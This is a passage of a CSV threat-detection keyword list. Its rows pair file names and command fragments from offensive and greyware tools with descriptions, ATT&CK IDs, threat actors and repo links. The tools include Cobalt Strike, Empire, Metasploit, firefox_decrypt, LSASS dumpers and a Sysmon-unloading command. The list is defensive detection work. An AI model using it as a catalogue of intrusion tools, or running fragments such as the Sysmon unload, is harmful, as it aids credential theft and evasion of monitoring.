?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*FindUncommonShares.py *,offensive_tool_keyword,FindUncommonShares,FindUncommonShares.py is a Python equivalent of PowerView's Invoke-ShareFinder.ps1 allowing to quickly find uncommon shares in vast Windows Domains,T1135,TA0007,N/A,N/A,Discovery,https://github.com/p0dalirius/FindUncommonShares,1,0,N/A,N/A,4,331,38,2023-10-03T21:49:54Z,2021-10-06T12:30:16Z -*FindUncommonShares-main*,offensive_tool_keyword,FindUncommonShares,FindUncommonShares.py is a Python equivalent of PowerView's Invoke-ShareFinder.ps1 allowing to quickly find uncommon shares in vast Windows Domains,T1135,TA0007,N/A,N/A,Discovery,https://github.com/p0dalirius/FindUncommonShares,1,1,N/A,N/A,4,331,38,2023-10-03T21:49:54Z,2021-10-06T12:30:16Z -*finduncshar_scan*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*Find-UnsafeLogonScriptPermissions.ps1*,offensive_tool_keyword,ScriptSentry,ScriptSentry finds misconfigured and dangerous logon scripts.,T1037 - T1037.005 - T1046,TA0005 - TA0007,N/A,N/A,Credential Access,https://github.com/techspence/ScriptSentry,1,1,N/A,7,1,44,3,2023-08-16T19:32:24Z,2023-07-22T03:17:58Z -*Find-UnsafeUNCPermissions -UNCScripts*,offensive_tool_keyword,ScriptSentry,ScriptSentry finds misconfigured and dangerous logon scripts.,T1037 - T1037.005 - T1046,TA0005 - TA0007,N/A,N/A,Credential Access,https://github.com/techspence/ScriptSentry,1,0,N/A,7,1,44,3,2023-08-16T19:32:24Z,2023-07-22T03:17:58Z -*Find-UnsafeUNCPermissions.ps1*,offensive_tool_keyword,ScriptSentry,ScriptSentry finds misconfigured and dangerous logon scripts.,T1037 - T1037.005 - T1046,TA0005 - TA0007,N/A,N/A,Credential Access,https://github.com/techspence/ScriptSentry,1,1,N/A,7,1,44,3,2023-08-16T19:32:24Z,2023-07-22T03:17:58Z -*Find-UserField -SearchField *,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,powerview.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Find-WMILocalAdminAccess*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,powerview.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*FireBuster.ps1*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*fireeye*commando*,offensive_tool_keyword,commando-vm,CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.,T1059 - T1053 - T1055 - T1070,TA0002 - TA0004 - TA0008,N/A,N/A,Exploitation OS,https://github.com/mandiant/commando-vm,1,1,N/A,N/A,10,6323,1248,2023-10-03T19:02:49Z,2019-03-26T22:36:32Z -*FireFart*dirtycow*,offensive_tool_keyword,POC,POC exploitation for dirtycow vulnerability,T1533,TA0003,N/A,N/A,Exploitation tools,https://github.com/FireFart/dirtycow,1,1,N/A,N/A,8,767,437,2021-04-08T11:35:12Z,2016-11-25T21:08:01Z -*firefox/FakeUpdate_files/*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,1,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -*firefox_decrypt.py*,offensive_tool_keyword,firefox_decrypt,Firefox Decrypt is a tool to extract passwords from Mozilla,T1555.003 - T1112 - T1056.001,TA0006 - TA0009 - TA0040,N/A,N/A,Credential Access,https://github.com/unode/firefox_decrypt,1,1,N/A,10,10,1622,283,2023-07-28T15:10:13Z,2014-01-17T13:25:02Z -*firefox_decrypt-main*,offensive_tool_keyword,firefox_decrypt,Firefox Decrypt is a tool to extract passwords from Mozilla,T1555.003 - T1112 - T1056.001,TA0006 - TA0009 - TA0040,N/A,N/A,Credential Access,https://github.com/unode/firefox_decrypt,1,1,N/A,10,10,1622,283,2023-07-28T15:10:13Z,2014-01-17T13:25:02Z -*firefox_extension_bindshell*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*firefox_extension_reverse_shell*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*firefox_privilege_escalation.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*firefox_privilege_escalation_spec.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*firefox_smil_uaf*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*FireListener.ps1*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z -*Firesheep/*,offensive_tool_keyword,firesheep,Free program for HTTP session hijacking attacks.,T1550 - T1555 - T1559 - T1565,TA0002 - TA0007,N/A,N/A,Sniffing & Spoofing,https://codebutler.github.io/firesheep/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Firewall_Walker_BOF*,offensive_tool_keyword,cobaltstrike,A BOF to interact with COM objects associated with the Windows software firewall.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EspressoCake/Firewall_Walker_BOF,1,1,N/A,10,10,98,13,2021-10-10T03:28:27Z,2021-10-09T05:17:10Z -*fishing_with_hollowing*,offensive_tool_keyword,cobaltstrike,A cobaltstrike shellcode loader - past domestic mainstream antivirus software,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/YDHCUI/csload.net,1,1,N/A,10,10,123,13,2021-05-21T02:36:03Z,2021-05-20T08:24:16Z -*fjoaledfpmneenckfbpdfhkmimnjocfa*,greyware_tool_keyword,NordVPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*fkasler/cuddlephish*,offensive_tool_keyword,cuddlephish,Weaponized Browser-in-the-Middle (BitM) for Penetration Testers,T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001,TA0009 - TA0006,N/A,N/A,Sniffing & Spoofing,https://github.com/fkasler/cuddlephish,1,1,N/A,10,2,152,10,2023-09-06T12:25:08Z,2023-08-02T14:30:41Z -*Flangvik/NetLoader*,offensive_tool_keyword,NetLoader,Loads any C# binary in memory - patching AMSI + ETW,T1055.012 - T1112 - T1562.001,TA0005 - TA0002,N/A,N/A,Exploitation tools - Defense Evasion,https://github.com/Flangvik/NetLoader,1,1,N/A,10,7,684,139,2021-10-03T16:41:03Z,2020-05-05T15:20:16Z -*Flangvik/SharpExfiltrate*,offensive_tool_keyword,SharpExfiltrate,Modular C# framework to exfiltrate loot over secure and trusted channels.,T1027 - T1567 - T1561,TA0010 - TA0040 - TA0005,N/A,N/A,Data Exfiltration,https://github.com/Flangvik/SharpExfiltrate,1,1,N/A,10,2,116,26,2021-09-12T17:08:02Z,2021-09-08T13:17:00Z -*flashupdate.ps1*,offensive_tool_keyword,Zloader,Zloader Installs Remote Access Backdoors and Delivers Cobalt Strike,T1059 - T1220 - T1566.001 - T1059.005 - T1218.011 - T1562.001 - T1204,TA0002 - TA0008 - TA0006 - TA0001 - TA0010 - TA0003,N/A,N/A,Exploitation tools,https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*florylsk/NtRemoteLoad*,offensive_tool_keyword,NtRemoteLoad,Remote Shellcode Injector,T1055 - T1027 - T1218.010,TA0002 - TA0005 - TA0010,N/A,N/A,Exploitation tool,https://github.com/florylsk/NtRemoteLoad,1,1,N/A,10,2,173,35,2023-08-27T17:14:44Z,2023-08-27T16:52:31Z -*fltMC* unload SysmonDrv*,offensive_tool_keyword,fltMC,Unload Sysmon driver. allow the attacker to bypass sysmon detections (most of it. network monitoring will still be effective),T1562.006 - T1562.002 - T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/mthcht/Purpleteam/blob/main/Simulation/Windows/System/unload_sysmon_driver_with_fltmc.ps1,1,0,N/A,N/A,1,91,6,2023-10-01T14:24:00Z,2022-12-05T12:40:02Z -*FluxionNetwork*,offensive_tool_keyword,FluxionNetwork,Fluxion is a security auditing and social-engineering research tool. It is a remake of linset by vk496 with (hopefully) fewer bugs and more functionality. The script attempts to retrieve the WPA/WPA2 key from a target access point by means of a social engineering (phishing) attack. Its compatible with the latest release of Kali (rolling). Fluxions attacks' setup is mostly manual. but experimental auto-mode handles some of the attacks' setup parameters. Read the FAQ before requesting issues,T1559 - T1189 - T1059 - T1566 - T1056,TA0001 - TA0002 - TA0009,N/A,N/A,Phishing,https://github.com/FluxionNetwork/fluxion,1,1,N/A,N/A,10,4340,1377,2023-08-30T20:11:16Z,2017-04-29T10:22:27Z -*fodhelperbypass*,offensive_tool_keyword,Earth Lusca Operations Tools,Earth Lusca Operations Tools and commands,T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005,TA0001 - TA0002 - TA0003,cobaltstrike - mimikatz - powersploit - shadowpad - winnti,Earth Lusca,Exploitation tools,https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*fodhelperUACBypass*,offensive_tool_keyword,Earth Lusca Operations Tools ,Earth Lusca Operations Tools and commands,T1203 - T1218 - T1027 - T1064 - T1029 - T1210 - T1090,TA0007 - TA0008,N/A,N/A,Exploitation tools,https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/winscripting/UAC-bypass/blob/master/FodhelperBypass.ps1,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*foiopecknacmiihiocgdjgbjokkpkohc*,greyware_tool_keyword,VPN Professional,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*Follina.Ninja*,offensive_tool_keyword,Ninja,Open source C2 server created for stealth red team operations,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/ahmedkhlief/Ninja,1,1,N/A,10,10,720,166,2022-09-26T16:07:43Z,2020-03-04T14:17:22Z -*follina.py*muban.docx*,offensive_tool_keyword,POC,Just another PoC for the new MSDT-Exploit,T1190 - T1203 - T1068 - T1210,TA0001 - TA0002 - TA0005 - TA0006,N/A,N/A,Exploitation tools,https://github.com/komomon/CVE-2022-30190-follina-Office-MSDT-Fixed,1,1,N/A,N/A,4,387,57,2023-04-13T16:46:26Z,2022-06-02T12:33:18Z -*Follina/follina.html*,offensive_tool_keyword,Ninja,Open source C2 server created for stealth red team operations,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/ahmedkhlief/Ninja,1,1,N/A,10,10,720,166,2022-09-26T16:07:43Z,2020-03-04T14:17:22Z -*Follina/Follinadoc*,offensive_tool_keyword,Ninja,Open source C2 server created for stealth red team operations,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/ahmedkhlief/Ninja,1,1,N/A,10,10,720,166,2022-09-26T16:07:43Z,2020-03-04T14:17:22Z -*for /f %%i in (C:\Windows\IME\ok.txt)*,offensive_tool_keyword,Earth Lusca Operations Tools,Earth Lusca Operations Tools and commands,T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005,TA0001 - TA0002 - TA0003,cobaltstrike - mimikatz - powersploit - shadowpad - winnti,Earth Lusca,Exploitation tools,https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*for /r c:\windows\system32\ %i in (*sht*.exe)*,offensive_tool_keyword,Earth Lusca Operations Tools,Earth Lusca Operations Tools and commands,T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005,TA0001 - TA0002 - TA0003,cobaltstrike - mimikatz - powersploit - shadowpad - winnti,Earth Lusca,Exploitation tools,https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*for i in {1..65535}*,greyware_tool_keyword,bash port scan,linux commands abused by attackers,T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136,TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002,N/A,N/A,Network Exploitation tools,N/A,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*-force-forwardableet-ADComputer*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/SecureAuthCorp/impacket/blob/master/examples/getST.py,1,0,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*foreign_access.cna*,offensive_tool_keyword,cobaltstrike,LSASS Dumping With Foreign Handles,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/alfarom256/BOF-ForeignLsass,1,1,N/A,10,10,96,25,2021-08-23T16:57:08Z,2021-08-21T00:19:29Z -*foreign_lsass * *,offensive_tool_keyword,cobaltstrike,LSASS Dumping With Foreign Handles,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/alfarom256/BOF-ForeignLsass,1,0,N/A,10,10,96,25,2021-08-23T16:57:08Z,2021-08-21T00:19:29Z -*foreign_lsass.c*,offensive_tool_keyword,cobaltstrike,LSASS Dumping With Foreign Handles,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/alfarom256/BOF-ForeignLsass,1,1,N/A,10,10,96,25,2021-08-23T16:57:08Z,2021-08-21T00:19:29Z -*foreign_lsass.x64*,offensive_tool_keyword,cobaltstrike,LSASS Dumping With Foreign Handles,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - 